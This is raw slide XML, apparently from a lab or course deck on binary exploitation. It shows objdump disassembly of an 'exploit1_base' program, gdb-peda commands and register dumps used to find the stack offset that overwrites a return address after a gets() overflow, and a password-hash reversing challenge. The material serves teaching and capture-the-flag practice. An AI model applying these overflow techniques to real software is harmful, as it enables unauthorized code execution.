              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>)</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400619:   c7 45 fc 70 00 00 00    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>   $0x70,-0x4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>)</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400620:   8b 45 fc                mov    -0x4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
              <a:ea typeface="Tahoma" pitchFamily="2"/>
            </a:endParaRP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400623:   6b c0 34                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>imul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>   $0x34,%eax,%eax</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400626:   89 45 fc                mov    %eax,-0x4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>)</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400629:   bf 44 07 40 00          mov    $0x400744,%edi</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40062e:   e8 8d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>fe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t> ff </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>ff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>callq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>  4004c0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>puts@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>&gt;</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400633:   bf 00 00 00 00          mov    $0x0,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EA7600"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Calibri" pitchFamily="34"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>  400638:   e8 d3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>fe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t> ff </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>ff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>callq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>  400510 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>exit@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EA7600"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Calibri" pitchFamily="34"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Courier 10 Pitch" pitchFamily="33"/>
              <a:ea typeface="Tahoma" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43880B94-1BC6-49FE-AD53-E0249091A0E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7040880" y="3108959"/>
            <a:ext cx="5212080" cy="35661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Tahoma" pitchFamily="2"/>
                <a:cs typeface="Lohit Devanagari" pitchFamily="2"/>
              </a:rPr>
              <a:t>Let’s take a look at the assembly.</a:t>
            </a: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Tahoma" pitchFamily="2"/>
                <a:cs typeface="Lohit Devanagari" pitchFamily="2"/>
              </a:rPr>
              <a:t>#objdump -d -j .text exploit1_base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" rtl="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Liberation Sans" pitchFamily="18"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
                <a:cs typeface="Lohit Devanagari" pitchFamily="2"/>
              </a:rPr>
              <a:t>● </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Liberation Sans" pitchFamily="18"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
                <a:cs typeface="Lohit Devanagari" pitchFamily="2"/>
              </a:rPr>
              <a:t>Notice the call to gets() at 400682;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" rtl="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Liberation Sans" pitchFamily="18"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
                <a:cs typeface="Lohit Devanagari" pitchFamily="2"/>
              </a:rPr>
              <a:t>● </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Liberation Sans" pitchFamily="18"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
                <a:cs typeface="Lohit Devanagari" pitchFamily="2"/>
              </a:rPr>
              <a:t>The instructions preceeding that are</a:t>
            </a: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Tahoma" pitchFamily="2"/>
                <a:cs typeface="Lohit Devanagari" pitchFamily="2"/>
              </a:rPr>
              <a:t>our f2 method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6921AC8-561D-4AB0-8664-86D8F7CE2DBF}"/>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8C91E233-FA49-43B5-8B80-9CBE29333F1C}"/>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Using tools in gdb-peda we can create a long string of characters that</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contains no repeating sequences and then pass this to our program as</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Input, to figure out how much we need to overrun the buffer to get control of the stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EA7600"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Calibri" pitchFamily="34"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>gdb-peda$ pattern_create 400 pattern.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EA7600"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Calibri" pitchFamily="34"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>gdb-peda$ run &lt; pattern.txt</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This will inevitably overwrite our return address with an invalid address</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and will cause our program to crash with a segmentation fault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A67B558-61B4-4D43-8F89-34137BCF0D55}"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE244EF6-92CD-451B-8C77-A8B93DD7CF9E}"/>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3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Sam just learned about password hashing and decided to try his hand at writing his own password hashing function. He wrote a password hashing program that took his password and created output that looks like other password hashing programs - 414d6554696d65546f6f - awesome! Unfortunately, it is not as secure. Utilizing his &lt;A HREF="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>binary_analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>/hash_password1"&gt;password hashing binary&lt;/a&gt;, reverse his hash output to determine his original password.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BD4B6E0-B5DB-47CA-A3ED-21818D62040D}"/>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9F5B1663-57AD-48D6-8F54-37B2FE0B37BD}"/>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endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
              <a:ea typeface="Tahoma" pitchFamily="2"/>
            </a:endParaRP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[----------------------------------registers-----------------------------------]</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RAX: 0x7fffffffde80 ("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>AAA%AAsAABAA$AAnAACAA-AA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>(AAD\003")</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RBX: 0x0</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RCX: 0xfbad2098</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RDX: 0x0</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RSI: 0x7ffff7ff5000 ("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>AAA%AAsAABAA$AAnAACAA-AA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)</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RDI: 0x0</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RBP: 0x6141414541412941 ('A)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>AAEAAa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EA7600"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Calibri" pitchFamily="34"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>RSP: 0x7fffffffdea8 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>A%sA%BA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>%$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>A%nA%CA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>%-A%(A%DA%;A%)A%EA%"...)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BE3CD26-8E4F-4623-B296-E1886E1094CF}"/>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0D61EFEC-F220-46A9-A59C-47E8799B08EC}"/>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r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>RSP: 0x7fffffffdea8 ("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>AA0AAFAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>A%sA%BA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>%$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>A%nA%CA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>%-A%(A%DA%;A%)A%EA%"...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EA7600"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Calibri" pitchFamily="34"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Lets look at the address that our stack pointer was trying to reference when the program crashed, and then find that value in our input pattern to determine where the return address will start being overwritten.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EA7600"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Calibri" pitchFamily="34"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>gdb-peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>$ pattern offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>AA0AAFA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
